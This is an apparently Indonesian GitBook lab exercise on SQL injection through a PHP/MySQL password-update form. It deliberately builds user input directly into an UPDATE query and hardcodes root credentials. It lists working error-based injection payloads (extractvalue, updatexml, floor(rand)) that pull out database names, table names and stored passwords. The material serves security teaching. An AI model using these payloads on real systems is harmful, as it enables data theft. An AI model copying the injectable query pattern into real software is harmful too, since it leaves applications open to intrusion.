Powered by GitBook

MySQL Update Query

Masalah

<html>
   <body>
   <h1>Update My Password</h1>
   <form action = "<?php $_PHP_SELF ?>" method = "POST">
      Password: <input type = "text" name = "pass" /> <input type = "submit" />
   </form>
   </body>
</html>

<?php

$mysqli = new mysqli("localhost", "root", "changethispassword", "exercise_session");

if ($mysqli->connect_errno)
{
    printf("Connect failed: %s\n", $mysqli->connect_error);
    exit();
}

if($_POST["pass"])
{
    $pass = $_POST["pass"];

    if ( !$mysqli->query("UPDATE tbl_mhs SET pass='$pass' WHERE nim='1296001'") ) {
        echo "Error code ({$mysqli->errno}): {$mysqli->error}" . "<br/>";
    } else {
        echo 'Query was sucessful, proceed.' . "<br/>";;
    }

    if ($result = $mysqli->query("select * from tbl_mhs where nim='1296001'"))
    {
        echo $result->num_rows;
        if ($result->num_rows > 0) {
            // output data of each row
            while($row = $result->fetch_assoc()) {
                echo "ID: " . $row["nim"]. " " . $row["pass"]. "<br>";
            }

        } else {
            echo "0 results";
        }

        $result->close();
    }

    echo "<h1>Worked Payloads</h1>";
    $colors = array("' and extractvalue(0x0a,concat(0x0a,(select database()))); #",
                    "' and  (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#",
                    "' and length(database()) #",
                    "' and hex(database()) #",
                    "' and hex(hex(substring(database(),1,3)))#",
                    "' or updatexml(1,concat(0x7e,(version())),0) #",
                    "' or updatexml(0,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),0) #",
                    "' or extractvalue(1,concat(0x7e,(select concat_ws(':',id, nim, pass) from tbl_mhs limit 0,1)))#",
                    "' or (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)#",
                    "' or (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)#");

    foreach ($colors as $value) {
        echo "<pre>$value</pre>";
    }
}

/*
‘ or (payload) or ‘
‘ and (payload) and ‘
‘ or (payload) and ’
‘ or (payload) and ‘=’
’*  (payload)   *‘
‘ or (payload) and ’
‘’ – (payload) – ‘’
*/

?>

Penyelesaian

Gunakan payload pada script diatas untuk menyelesaikannya.

Referensi

results matching ""

No results matching ""